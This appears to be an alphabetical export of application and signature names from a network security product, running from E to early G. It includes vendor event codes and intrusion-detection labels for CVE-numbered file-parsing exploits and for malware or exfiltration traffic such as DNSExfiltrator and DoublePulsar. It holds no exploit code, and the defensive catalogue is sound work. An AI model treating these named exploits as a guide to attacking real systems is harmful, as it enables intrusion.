EA-The-Simpsons-Tapped-Out
eAdjudication
EADOC
Eagleinvsys
Eagleview
EARLIZ
Earthcam
EarthLink
Easel.ly
EaseUS-Todo-Backup
EasiAdmin
Easy
Easy-Commission
Easy-Insight
Easy-Projects
Easy-Share
Easy-WebContent
EasyBib
EasyDNS
Easygrouper
Easymatch
Easymessenger
Easynews
Easypromos
EasyRevu
Easyvista
Eater
EatherWay
EazeWork
eazyBI
Eazyweb
eBay
eBillity-Time-Tracker
Ebix
eBiz-Tax-Center
eBLVD-Online-Meetings
Ebookers
EBSCO-Host
Ebsuite
eBuddy
ec12
ECA
ECA Certificate expires soon
ECA Certificate has expired
ECA-SetupHost.exe
ECABinaryChecksumSHA256 3080193
ECABinaryChecksumSHA256 3080194
ECABinaryChecksumSHA256 3080195
ECABinaryChecksumSHA512 3145729
eCarList
ECA_Comm_handshake_error
ECA_Comm_transport_error
ECA_Endpoint_changed
ECA_Endpoint_down
ECA_Endpoint_up
ECA_Metadata_connected
ECA_Metadata_connection_disconnected
ECA_Metadata_field_missing
ECA_Metadata_listening_socket
ECA_Metadata_login
ECA_Metadata_logout
ECA_Metadata_syntax_error
ECA_Metadata_system_metadata_received
ECA_Metadata_unknown_error
ECA_Situation-Application-Not-Identified
ECA_Situation-Last
ECA_Situation-Signature-Check-Failed
ECA_Situation-Signature-Check-Passed
ECA_Situation-Unsigned-Executable
eCC-Cloud
Ecertsonline
Echo
Echo-Service
EchoSpan
EchoWare
eCision
eCollege
eConnect-Email
Econsultancy
ecoPortal
EcountERP
EcoWebDesk
Ecquire
Edcor
EdgeCast
Edifecs
EDIS
Edisonlearning
EditGrid
EditionGuard
Edmodo
Edocr
eDonkey2000
Edublogs
Education
Education-MarketView
Educational Institutions
Educational Materials
Educational Video
eduClipper
Edward-Jones
EdX
Efax
Effective-Software
eFileCabinet
eFolder
Efront
eGain
Egencia
Egenera
EggZack
Egnyte
Egress
eHousing-Plus
EIA_Connection_to_eia_established
EIA_Connection_to_eia_lost
EIA_Executable_traffic_blocked
EIA_User_information_overlap
EIBinaryChecksum 2424833
EIBinaryChecksum 2424834
EIBinaryChecksum 2424835
EIBinaryName 2359297
EIBinaryName 2359298
EIBinaryName 2359299
EIBinaryName 2359300
EIBinaryName 2359301
EIBinaryName 2359302
EIBinaryName 2359303
EIBinaryName 2359304
EIBinaryName 2359305
EIBinaryName 2359306
EIBinaryName 2359307
EIBinaryName 2359308
EIBinaryName 2359309
EIBinaryName 2359310
EIBinaryName 2359311
EIBinaryName 2359312
EIBinaryName 2359313
EIBinaryName 2359314
EIBinaryName 2359315
EIBinaryName 2359316
EIBinaryName 2359317
EIBinaryName 2359318
EIBinaryName 2359319
EIBinaryName 2359320
EIBinaryName 2359321
EIBinaryName 2359322
EIBinaryName 2359323
EIBinaryName 2359324
EIBinaryName 2359325
EIBinaryName 2359326
EIBinaryName 2359327
EIBinaryName 2359328
EIBinaryName 2359329
EIBinaryName 2359330
EIBinaryName 2359331
EIBinaryName 2359332
EIBinaryName 2359333
EIBinaryName 2359334
EIBinaryName 2359335
EIBinaryName 2359336
EIBinaryName 2359337
EIBinaryName 2359338
EIBinaryName 2359339
EIBinaryName 2359340
EIBinaryName 2359341
EIBinaryName 2359342
EIBinaryName 2359343
EIBinaryName 2359344
EIBinaryName 2359345
EIBinaryName 2359346
EIBinaryName 2359347
EIBinaryName 2359348
EIBinaryName 2359349
EIBinaryName 2359350
EIBinaryName 2359351
EIBinaryName 2359352
EIBinaryName 2359353
EIBinaryName 2359354
EIBinaryName 2359355
EIBinaryName 2359356
EIBinaryName 2359357
EIBinaryName 2359358
EIBinaryName 2359359
EIBinaryName 2359360
EIBinaryName 2359361
EIBinaryName 2359362
EIBinaryName 2359363
EIBinaryName 2359364
EIBinaryName 2359365
EIBinaryName 2359366
EIBinaryName 2359367
EIBinaryName 2359368
EIBinaryName 2359369
EIBinaryName 2359370
EIBinaryName 2359371
EIBinaryName 2359372
EIBinaryName 2359373
EIBinaryName 2359374
EIBinaryName 2359375
EIBinaryName 2359376
EIBinaryName 2359377
EIBinaryName 2359378
EIBinaryName 2359379
EIBinaryName 2359380
EIBinaryName 2359381
EIBinaryName 2359382
EIBinaryName 2359383
EIBinaryName 2359384
EIBinaryName 2359385
EIBinaryName 2359386
EIBinaryName 2359387
EIBinaryName 2359388
EIBinaryName 2359389
EIBinaryName 2359390
EIBinaryName 2359391
EIBinaryName 2359392
EIBinaryName 2359393
EIBinaryName 2359394
EIMS
EIProductName 2162689
EIProductName 2162690
EIProductName 2162691
EIProductName 2162692
EIProductName 2162693
EIProductName 2162694
EIProductName 2162695
EIProductName 2162696
EIProductName 2162697
EIProductName 2162698
EIProductName 2162699
EIProductName 2162700
EIProductName 2162701
EIProductName 2162702
EIProductName 2162703
EIProductName 2162704
EIProductName 2162705
EIProductName 2162706
EIProductName 2162707
EIProductName 2162708
EIProductName 2162709
EIProductName 2162710
EIProductName 2162711
EIProductName 2162712
EIProductName 2162713
EIProductName 2162714
EIProductName 2162715
EIProductName 2162716
EIProductName 2162717
EIProductName 2162718
EIProductName 2162719
EIProductName 2162720
EIProductName 2162721
EIProductName 2162722
EIProductName 2162723
EIProductName 2162724
EIProductName 2162725
EIProductName 2162726
EIProductName 2162727
EIProductName 2162728
EIProductName 2162729
EIProductName 2162730
EIProductName 2162731
EIProductName 2162732
EIProductName 2162733
EIProductName 2162734
EIProductName 2162735
EIProductName 2162736
EIProductName 2162737
EIProductName 2162738
EIProductName 2162739
EIProductName 2162740
EIProductName 2162741
EIProductName 2162742
EIProductName 2162743
EIProductName 2162744
EIProductName 2162745
EIProductName 2162746
EIProductName 2162747
EIProductName 2162748
EIProductName 2162749
EIProductName 2162750
EIProductName 2162751
EIProductName 2162752
EIProductName 2162753
EIProductName 2162754
EIProductName 2162755
EIProductName 2162756
EIProductName 2162757
EIProductName 2162758
EIProductName 2162759
EIProductName 2162760
EIProductName 2162761
EIProductName 2162762
EIProductName 2162763
EIProductName 2162764
EIProductName 2162765
EIProductName 2162766
EIProductName 2162767
EIProductName 2162768
EIProductName 2162769
EIProductName 2162770
EIProductName 2162771
EIProductName 2162772
EIProductName 2162773
EIProductName 2162774
EIProductName 2162775
EIProductName 2162776
EIProductName 2162777
EIProductName 2162778
EIProductName 2162779
EIProductName 2162780
EIProductName 2162781
EIProductName 2162782
EIProductName 2162783
EIProductName 2162784
EIProductName 2162785
EIProductName 2162786
EIProductName 2162787
EIProductName 2162788
EIProductName 2162789
EIProductName 2162790
EIProductName 2162791
EIProductName 2162792
EIProductName 2162793
EIProductName 2162794
EIProductName 2162795
EIProductName 2162796
EIProductName 2162797
EIProductName 2162798
EIProductName 2162799
EIProductName 2162800
EIProductName 2162801
EIProductName 2162802
EIProductName 2162803
EIProductName 2162804
EIProductName 2162805
EIProductName 2162806
EIProductName 2162807
EIProductName 2162808
EIProductName 2162809
EIProductName 2162810
EIProductName 2162811
EIProductName 2162812
EIProductName 2162813
EIProductName 2162814
EIProductName 2162815
EIProductName 2162816
EIProductName 2162817
EIProductName 2162818
EIProductName 2162819
EIProductName 2162820
EIProductName 2162821
EIProductName 2162822
EIProductName 2162823
EIProductName 2162824
EIProductName 2162825
EIProductName 2162826
EIProductName 2162827
EIProductName 2162828
EIProductName 2162829
EIProductName 2162830
EIProductName 2162831
EIProductName 2162832
EIProductName 2162833
EIProductName 2162834
EIProductName 2162835
EIProductName 2162836
EIProductName 2162837
EIProductName 2162838
EIProductName 2162839
EIProductName 2162840
EIProductName 2162841
EIProductName 2162842
EIProductName 2162843
EIProductName 2162844
EIProductName 2162845
EIProductName 2162846
EIProductName 2162847
EIProductName 2162848
EIProductName 2162849
EIProductName 2162850
EIProductName 2162851
EIProductName 2162852
EIProductName 2162853
EIProductName 2162854
EIProductName 2162855
EIProductName 2162856
EIProductName 2162857
EIProductName 2162858
EIProductName 2162859
EIProductName 2162860
EIProductName 2162861
EIProductName 2162862
EIProductName 2162863
EIProductName 2162864
EIProductName 2162865
EIProductName 2162866
EIProductName 2162867
EIProductName 2162868
EIProductName 2162869
EIProductName 2162870
EIProductName 2162871
EIProductName 2162872
EIProductName 2162873
EIProductName 2162874
EIProductName 2162875
EIProductName 2162876
EIProductName 2162877
EIProductName 2162878
EIProductName 2162879
EIProductName 2162880
EIProductName 2162881
EIProductName 2162882
EIProductName 2162883
EIProductName 2162884
EIProductName 2162885
EIProductName 2162886
EIProductName 2162887
EIProductName 2162888
EIProductName 2162889
EIProductName 2162890
EIProductName 2162891
EIProductName 2162892
EIProductName 2162893
EIProductName 2162894
EIProductName 2162895
EIProductName 2162896
EIProductName 2162897
Eircom
EIS-Group
EISignerChecksum 2293761
EISignerChecksum 2293762
EISignerChecksum 2293763
EISignerChecksum 2293764
EISignerChecksum 2293765
EISignerChecksum 2293766
EISignerChecksum 2293767
EISignerChecksum 2293768
EISignerChecksum 2293769
EISignerChecksum 2293770
EISignerChecksum 2293771
EISignerChecksum 2293772
EISignerChecksum 2293773
EISignerChecksum 2293774
EISignerChecksum 2293775
EISignerChecksum 2293776
EISignerChecksum 2293777
EISignerChecksum 2293778
EISignerChecksum 2293779
EISignerName 2490369
EISignerName 2490370
EISignerName 2490371
EISignerName 2490372
EISignerName 2490373
EISignerName 2490374
EISignerName 2490375
EISignerName 2490376
EISignerName 2490377
EISignerName 2490378
EISignerName 2490379
EISignerName 2490380
EISignerName 2490381
EISignerName 2490382
EISignerName 2490383
EISignerName 2490384
EISignerName 2490385
EISignerName 2490386
EISignerName 2490387
EISignerName 2490388
EISignerName 2490389
EISignerName 2490390
EISignerName 2490391
EISignerName 2490392
EISignerName 2490393
EISignerName 2490394
EISignerName 2490395
EISignerName 2490396
EISignerName 2490397
EISignerName 2490398
EISignerName 2490399
EISignerName 2490400
EISignerName 2490401
EISignerName 2490402
EISignerName 2490403
EISignerName 2490404
EISignerName 2490405
EISignerName 2490406
EISignerName 2490407
EISignerName 2490408
EISignerName 2490409
EISignerName 2490410
EISignerName 2490411
EISignerName 2490412
EISignerName 2490413
EISignerName 2490414
EISignerName 2490415
EISignerName 2490416
EISignerName 2490417
EISignerName 2490418
EISignerName 2490419
EISignerName 2490420
EISignerName 2490421
EISignerName 2490422
EISignerName 2490423
EISignerName 2490424
EISignerName 2490425
EISignerName 2490426
EISignerName 2490427
EISignerName 2490428
EISignerName 2490429
EISignerName 2490430
EISignerName 2490431
EISignerName 2490432
EISignerName 2490433
EISignerName 2490434
EISignerName 2490435
EISignerName 2490436
EISignerName 2490437
EISignerName 2490438
EISignerName 2490439
EISignerName 2490440
EISignerName 2490441
EISignerName 2490442
EISignerName 2490443
EISignerName 2490444
EISignerName 2490445
EISignerName 2490446
EISignerName 2490447
EISignerName 2490448
EISignerName 2490449
EISignerName 2490450
EISignerName 2490451
EISignerName 2490452
EISignerName 2490453
EISignerName 2490454
EISignerName 2490455
EISignerName 2490456
EISignerName 2490457
EISignerName 2490458
EISignerName 2490459
EISignerName 2490460
EISignerName 2490461
EISignerName 2490462
EISignerName 2490463
EISignerName 2490464
EISignerName 2490465
EISignerName 2490466
EISignerName 2490467
EISignerName 2490468
EISignerName 2490469
EISignerName 2490470
EISignerName 2490471
EISignerName 2490472
EISignerName 2490473
EISignerName 2490474
EISignerName 2490475
Ektron
Ekualiti
Elastic-Server
Elastica
Elder-Scrolls-Online
Elead
eLeaP
Electronic-Federal-Tax-Payment-System
Element-Payment-Services
Elementool
Elemica
Elephantdrive
Elevated Exposure
Elite-Email
Ellucian
Elluminate
Eloqua
Elucidat
Email-Center-Pro
Email-Data-Source
Email-It
Email-Laundry
Email-Me-Form
Email2DB
eMaint
eMarketing-Suite
Emaze
Embassy-Software
Embed.ly
EMC
EMC-Documentum-Webtop
Emediate
Emerging Exploits
EMEX
Emma
eMobus
eMoney-Advisor
Empflix
Empire-Avenue
Employ-Florida-Marketplace
Employee-Benefits-Corporation
Employer-eservices
Employers-Choice-Online
EmployWise
EmpXtrack
Emulex
EnableHR
Enbrite.ly
Enchanted-Learning
Encoding.com
Encrypted-Server-Name-Indicator
Endava
Endicia
EndNote
Endomondo
Endpoint-Application-Unknown
Endpoint-Context-Unavailable
Endpoint-Modeling
Endpoint-Operating-System-Unknown
Enea
Enfos
Engage
Engage2Excel
Engagor
Engine-Yard
Engineyard.cloud
Enjin
enjoyQR
Enli
eNom
Enroll
Enrollment-Rx
Ensighten
Enspire-Commerce
Enstratius
Enternships
Enterprise-Business-Software
EnterpriseDB
Entertainment
Entertainment Video
Entertainment-Weekly
Entertane.com
Enthusem
Entree
entreprise-facile
Entrust
Entrust-AIA
Entrust-CRL
Entrust-Online-Certificate-Status-Service
Entryless
Envato
Envestnet
Enviance-EHS
Envision-ITS
Epam
Epic-Games
Epic-Games-Infinity-Blade
Epic-Games-Infinity-Blade-2
Epic-IT
Epicor-Financial-Management
EpiqSystems
ePlan-Services
eplus
EPM-Live
ePost
ePropertySites.com
Equala
equens
Equifax
Equinix
EQWin-Data-Manager
eReceptionist
Erecruit
eReviewz
Ericom-AccessNow
Ericsson
ERMSIM-Strategy-Analytics
Eroom-Hosting
Eroom-Net
Erply
ERPNext
erpWizard
Errorception
Escrow.com
Escuela-Campo-Alegre
ESET-Remote-Administrator
Esignal
Esignit
ESIGroup
ESL-ReadingSmart
ESM-Software
eSnips
eSOL
eSpatial
Espion-Group
ESPN
Esponce
Esri-ArcGIS
Esri-Customer-Care
Essential-Learning
EstiBot
eStreamDesk-Helpdesk
eSuite-platform
eSurveysPro
Eteamz
Ethernet/IP
Ethernet_Frame-Discarded
Ethernet_Frame-Received
Ethernet_Too-Short-Frame
EtherPad
Ethn.io
Etisalat-Cloud
Etouches
ETran
Etsy
Etuovi
Etv
Etz
EucalyptusSystems
EuroDNS
EV.Cloud
Evaluation Period expired
Evaluation Period expiring
eVapt
eVariant
EVault-Storage-Service
Eve-Online
Eventbrite
EventMobi
Eventzilla
Everbridge.com
Evercontact
Evergage
Everlane
Evernote
Everquest
Everyday-EDI
Evident.io
Evite
eVoice
EvolveIP
evoPay
Evzdrop
eWay
Exact-Abacus
Exact-Online
ExactTarget
Examiner
ExaVault
ExceptionHub
Exchange-RPC-Over-HTTP
Excite-Webmail
Executable File
Execution of Backup Task Failed
Execution of Backup Task Succeeded
Execution of Command Task Failed
Execution of Command Task Succeeded
Execution of Log Data Task Failed
Execution of Log Data Task Succeeded
Execution of Policy Task Failed
Execution of Policy Task Succeeded
Execution of Remote Upgrade Task Failed
Execution of Remote Upgrade Task Succeeded
Execution of SOHO Task Failed
Execution of SOHO Task Succeeded
EXFO
eXo-Platform
Exosrv
Expedia
Expensecloud
Expenseondemand
ExpenseWatch
EXPENSEWIRE
Expensify
Experian
ExpertFlyer.com
Experticity
ExpertPay-for-Obligors
ExpertPlan
Experts-Exchange
ExploreGate-LMS
ExploreLearning
Explorer.exe
ExpressionEngine
Exsalerate
Exsellence
Extabit
Extended Protection
Extendedtechnology
Extendr
External Gateway does not trust new VPN Certificate Authority
External Gateway that trusts all VPN Certificate Authorities does not trust new VPN Certificate Authority
Extility
EXTOL
ExxpertApps
EY-CertifyPoint
Eye-Fi
Eylean
eZ-Account
Ez-Texting
EZasset-Business-Asset-Management
EZBIS
eZCom---Lingo
eZee-Centrix
Ezidebit
EZShield
EZTrackIt
ezyCollect
F-Prot-AntiVirus-Update-Service
F-Secure
F-Secure Installer
F-Secure SAFE
F-Secure Software Updater
F-Secure-Automatic-Updates
F-Secure-Management-Server
F-Secure-Online-Backup
F5-Networks
Fabasoft
Fabasoft-Folio-Cloud
Fabulous
Facebook
Facebook Apps
Facebook Chat
Facebook Commenting
Facebook Events
Facebook Friends
Facebook Games
Facebook Groups
Facebook Mail
Facebook Photo Upload
Facebook Posting
Facebook Questions
Facebook Video Upload
Facebook-Apps
Facebook-Chat
Facebook-Games
Facebook-Live
Facebook-Plugins-Activity-Feed
Facebook-Plugins-Comments
Facebook-Plugins-Facepile
Facebook-Plugins-Like-Box
Facebook-Plugins-Like-Button
Facebook-Plugins-Login-Button
Facebook-Plugins-Recommend-Button
Facebook-Plugins-Recommendations-Box
Facebook-Plugins-Registration
Facebook-Plugins-Send-Button
Facebook-Plugins-Share-Button
Facebook-Rooms
Facebook-Workplace
Factor-4-Index-Subdomain
Factual
Failed OATH database backup
Fairmont-Hotels
Fairsail
Fairwinds
Faithful-Steward-Church-Management-Software-Solutions
Falcon-Social
FalconStorSoftware
Fallout 3
Fallout New Vegas
Fandango
FanFueled
Fanurio
Farmatech-Radmin
FASOTEC
Fast-React-Systems
Fastenterprises
Fasthosts
Fastly
Fastly-Insights
FastMail
FastTrack
Fastviewer
FAT-FINGER
Fathom
Fatwallet
Faxit-Nice
Fc2-Blog
FCM-Client-Portal
FCS-live
Federated-Media
FedEx
FeedbackServer
Feedbackstr
Feedblitz
Feedity
Feedly
FeedMyInbox
Feitian-Technologies
Feng-Office
Fetch.io
FetchApp
Fetion-Instant-Messaging
Fetion-Instant-Messaging-File-Transfer
Fever
FG-Receivables-Manager
fi360-Designees
Fiabee
Fidelity-Investments
Fidelity-NetBenefits
Fidessa
FieldAware
Fieldglass
FieldLocate
FieldLogix
FieldService360
FieldSync-Health
File Download Servers
File reputation updated
File-Archive-Member_Office-Open-XML-Application-Properties-Part
File-Archive-Member_Office-Open-XML-Core-Properties-Part
File-Archive-Member_XML
File-Binary_7-Zip-7z-File-Ppmd-Properties-Parsing-Integer-Underflow-Vulnerability
File-Binary_7-Zip-Squashfs-File-Uidtable-Parsing-Buffer-Overflow-Vulnerability
File-Binary_7-Zip-Zstandard-Decompression-Integer-Underflow-CVE-2024-11477
File-Binary_ACE-Archive
File-Binary_Adobe-Acrobat-EMF-Emfplusdrawlines-Count-Heap-Buffer-Overflow
File-Binary_Adobe-Acrobat-EMF-EMR_alphablend-CVE-2018-12789-Out-Of-Bounds-Read
File-Binary_Adobe-Acrobat-Imageconversion-EMF-BMP-Heap-Buffer-Overflow
File-Binary_Adobe-Acrobat-Imageconversion-EMF-BMP-Out-Of-Bounds-Read
File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfplus-Heap-Based-Buffer-Overflow
File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfplusdrawbeziers-Type-Confusion
File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfpluspath-Object-Heap-Buffer-Overflow
File-Binary_Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchblt-Out-Of-Bounds-Read
File-Binary_Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchdibits-Heap-Based-Buffer-Overflow
File-Binary_Adobe-Acrobat-Imageconversion-EMF-Heap-Based-Buffer-Overflow
File-Binary_Adobe-Acrobat-Imageconversion-EMF-Integer-Overflow
File-Binary_Adobe-Acrobat-Imageconversion-EMF-Parsing-Integer-Overflow
File-Binary_Adobe-Acrobat-Imageconversion-EMF-Parsing-Out-Of-Bounds-Read
File-Binary_Adobe-Acrobat-Imageconversion-Emfplus-Heap-Based-Buffer-Overflow
File-Binary_Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Information-Disclosure
File-Binary_Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Out-Of-Bounds-Read
File-Binary_Adobe-Acrobat-Pro-Heap-Buffer-Overflow-CVE-2014-0529
File-Binary_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2965
File-Binary_Adobe-Acrobat-XPS-Font-Parsing-Out-Of-Bounds-Read
File-Binary_Adobe-Audition-Session-File-Stack-Buffer-Overflow
File-Binary_Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow
File-Binary_Adobe-Camera-Raw-Plugin-TIFF-Image-Processing-Buffer-Underflow
File-Binary_Adobe-DNG-Software-Development-Kit-Decodeimage-Out-Of-Bounds-Read
File-Binary_Adobe-DNG-Software-Development-Kit-Readunvar10ed-Heap-Buffer-Overflow
File-Binary_Adobe-Flash-Exploit-CVE-2011-0609
File-Binary_Adobe-Flash-Exploit-CVE-2011-0611
File-Binary_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4141
File-Binary_Adobe-Flash-Mp3-Id3-Tag-Integer-Overflow
File-Binary_Adobe-Flash-Player-CVE-2017-2927
File-Binary_Adobe-Flash-Player-CVE-2017-2934
File-Binary_Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow
File-Binary_Adobe-Photoshop-TIFF-Parsing-Heap-Buffer-Overflow
File-Binary_Adobe-Reader-BMP-Multiple-Vulnerabilities
File-Binary_Adobe-Reader-BMP-Vulnerability-2011-2438c
File-Binary_Adobe-Reader-CVE-2017-2966
File-Binary_Adobe-Reader-Memory-Corruption-CVE-2017-3036
File-Binary_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Binary_Advantech-Adamview-Conditional-Bitmap-Remote-Code-Execution
File-Binary_Advantech-Adamview-Display-Properties-Parameter-Remote-Code-Execution
File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow
File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow-2
File-Binary_Apache-Dubbo-Httpremoteinvocation-Insecure-Deserialization
File-Binary_Apache-OpenOffice-Dbase-File-Handling-Buffer-Overflow
File-Binary_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
File-Binary_Apache-Tika-Chmparser-Denial-Of-Service
File-Binary_Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813
File-Binary_Apple-Computer-Finder-Dmg-Volume-Name-Memory-Corruption
File-Binary_Apple-Dmg-Disk-Image
File-Binary_Apple-iOS-Libtiff-Buffer-Overflow
File-Binary_Apple-Mac OS X-ImageIO-Psd-File-Parsing-Heap-Buffer-Overflow-CVE-2024-40777
File-Binary_Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption
File-Binary_Apple-QuickTime-BMP-Handling-Buffer-Overflow
File-Binary_Apple-QuickTime-Flic-Animation-File-Buffer-Overflow
File-Binary_Apple-QuickTime-Pict-File-Processing-Memory-Corruption
File-Binary_Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow
File-Binary_Apple-QuickTime-Psd-File-Parsing-CVE-2016-1769-Memory-Corruption
File-Binary_Apple-QuickTime-Targa-File-Buffer-Overflow
File-Binary_Apple-XAR-Archive-Parsing-Arbitrary-File-Write-Vulnerability
File-Binary_Apple-XAR-Archive-Symlink-Parsing-Arbitrary-File-Write-Vulnerability
File-Binary_Ar-Archive
File-Binary_ARJ-Archive
File-Binary_ARJ-Archive-Long-Local-File-Header-7-Zip-BOF
File-Binary_Autodesk-Animation-Flic-Video
File-Binary_Autodesk-Autocad-DWF
File-Binary_Autodesk-Autocad-DWG
File-Binary_Autodesk-Autocad-FAS
File-Binary_Avast-AntiVirus-Engine-Lha-Buffer-Overflow
File-Binary_Blizzard-MPQ-Archive
File-Binary_BZip2-Compressed-File-Download
File-Binary_CD-ROM-Disk-Image
File-Binary_Chasys-Draw-IES-BMP-Image-Processing-Buffer-Overflow
File-Binary_Cisco-UCS-Director-Copyfilerunnable-Run-Symlink-Remote-Code-Execution
File-Binary_Cisco-Webex-Player-Atas32.dll-Remote-Code-Execution
File-Binary_Cisco-Webex-Player-BOF
File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Integer-Overflow
File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Memory-Corruption
File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Subrecords-Integer-Overflow
File-Binary_Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Buffer-Overflow
File-Binary_Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Integer-Overflow
File-Binary_Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service
File-Binary_Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
File-Binary_Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service
File-Binary_Clamav-DMG-CLI_scandmg-External-Entity-Injection
File-Binary_Conflicting-Content-Type-JPEG
File-Binary_Conflicting-Content-Type-Text
File-Binary_Conflicting-Content-Type-Text-HTML
File-Binary_Conflicting-Content-Type-Text-Plain
File-Binary_CoolPlayer-Playlist-File-Handling-Buffer-Overflow
File-Binary_Corel-Wordperfect-Document-Processing-Buffer-Overflow
File-Binary_CUPS-Command-Injection-CVE-2024-47176
File-Binary_CUPS-Remote-Command-Execution-Via-FoomaticRIPCommandLine-CVE-2024-47177
File-Binary_Debian-Binary-Installation-Package
File-Binary_Delta-Electronics-CNCSoft-Screeneditor-CVE-2021-43982-Stack-Buffer-Overflow
File-Binary_Delta-Electronics-CNCSoft-Screeneditor-Element-Section-Stack-Buffer-Overflow
File-Binary_Delta-Electronics-CNCSoft-Screeneditor-File-Preview-Stack-Buffer-Overflow
File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-CVE-2022-1405-SBOF
File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Dpb-Giffile-Stack-Buffer-Overflow
File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Element-Name-Stack-BOF
File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Stack-Buffer-Overflow
File-Binary_Delta-Industrial-Automation-Diascreen-Dpa-File-Parsing-Stack-Buffer-Overflow
File-Binary_Delta-Industrial-Automation-DOPSoft-DPS-Stack-Buffer-Overflow
File-Binary_DGit-Remote-Code-Execution-Via-Git-lfs-CVE-2020-27955
File-Binary_Disk-Image-Transfer
File-Binary_DLL-Planting-Remote-Code-Execution-Vulnerability
File-Binary_DNSExfiltrator-Traffic
File-Binary_DoblePulsar-PeddleCheap-Implant-Traffic
File-Binary_Eaton-Hmisoft-Vu3-Giffile-Stack-Buffer-Overflow
File-Binary_Eaton-Hmisoft-Vu3-Multiple-Vulnerabilities
File-Binary_Eaton-Hmisoft-Vu3-wMailBlindCopyToLen-Stack-Buffer-Overflow
File-Binary_Eaton-Hmisoft-Vu3-Wmailcontentlen-Stack-Buffer-Overflow
File-Binary_Eaton-Hmisoft-Vu3-wMessageLen-Stack-Buffer-Overflow
File-Binary_Eaton-Hmisoft-Vu3-Wtextlen-Stack-Buffer-Overflow
File-Binary_EICAR-AntiVirus-Test
File-Binary_ELF-Executable-File-Transfer
File-Binary_Embedded-Zip-Archive
File-Binary_EMF-Windows-Graphics-Rendering-Engine-BOF
File-Binary_EMF-Windows-Graphics-Rendering-Engine-BOF-2
File-Binary_Endian-Firewall-Proxy-Password-Change-Command-Execution
File-Binary_EQGRP-Durablenapkin.Solaris.2.0.1.1
File-Binary_EQGRP-noclient
File-Binary_Exiftool-DjVu-Remote-Code-Execution
File-Binary_F-Prot-Anti-Virus-ACE-File-Denial-Of-Service
File-Binary_F-Secure-AntiVirus-Library-Heap-Overflow
File-Binary_Fareit-A-Botnet-Traffic
File-Binary_Fatek-Automation-PLC-Winproladder-Spf-Stack-Buffer-Overflow
File-Binary_Fatek-Automation-PLC-Winproladder-Stack-Buffer-Overflow
File-Binary_Fatek-Automation-PLC-Winproladder-Tab-Stack-Buffer-Overflow
File-Binary_FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow
File-Binary_FFmpeg-OGV-File-Format-Memory-Corruption
File-Binary_FFmpeg-Vmd_Read_Header-Integer-Overflow
File-Binary_Flac-Project-Libflac-Picture-Metadata-Mime-Type-Size-Buffer-Overflow
File-Binary_Flac-Project-Libflac-Vorbis-Comment-String-Size-Buffer-Overflow
File-Binary_Foxit-Reader-And-Phantompdf-Converttopdf-CVE-2020-8844-Integer-Overflow
File-Binary_Foxit-Reader-BMP-Biwidth-Heap-Based-Buffer-Overflow
File-Binary_Foxit-Reader-Converttopdf-BMP-Out-Of-Bounds-Read
File-Binary_Foxit-Studio-Photo-Psd-File-Imageresourceblocks-Out-Of-Bounds-Read
File-Binary_Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Read
File-Binary_Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Write
File-Binary_Foxit-Studio-Photo-TIFF-File-Processing-Integer-Overflow
File-Binary_FreeBSD-Bspatch-Utility-Remote-Code-Execution
File-Binary_Freetype-Heap-Buffer-Overflow-CVE-2020-15999
File-Binary_Fuji-Electric-V-Server-Heap-Buffer-Overflow
File-Binary_GD-Library-Libgd-gd2getheader-Integer-Overflow
File-Binary_GD-Library-Libgd-GD_gd2.c-Heap-Buffer-Overflow
File-Binary_GE-Mds-Pulsenet-Spring-Remoting-Httpinvoker-Insecure-Deserialization
File-Binary_GIMP-Psp-Image-Color-Palette-Block-Parsing-Integer-Overflow
File-Binary_GIMP-XWD-File-Handling-Heap-Buffer-Overflow
File-Binary_GIMP-XWD-File-Handling-Stack-Buffer-Overflow
File-Binary_Git-Client-Path-Validation-Command-Execution
File-Binary_Git-Source-Code-Management-Improper-Link-Resolution
File-Binary_Git-SSH-Url-Processing-Command-Execution
File-Binary_Git-Submodules-Directory-Traversal
File-Binary_Gitlab-Arbitrary-File-Write
File-Binary_Gnu-GIMP-DDS-Image-Parsing-Heap-Buffer-Overflow
File-Binary_Gnu-GIMP-Psd-Image-Channel-Data-Parsing-Heap-Buffer-Overflow
File-Binary_Gnu-GIMP-Psp-Image-Channel-Block-Parsing-Off-By-One-Buffer-Overflow
File-Binary_Gnu-Gzip-Lzh-Decompression-Make_Table-Stack-Modification
File-Binary_Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read
File-Binary_Gnu-Tar-From_Header-Out-Of-Bounds-Read
File-Binary_Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
File-Binary_Google-Chrome-CRX-Extension-Package
File-Binary_Google-Chrome-Skia-Integer-Overflow-CVE-2023-6345
File-Binary_Google-Chrome-Uninitialized-BugReport-Pointer
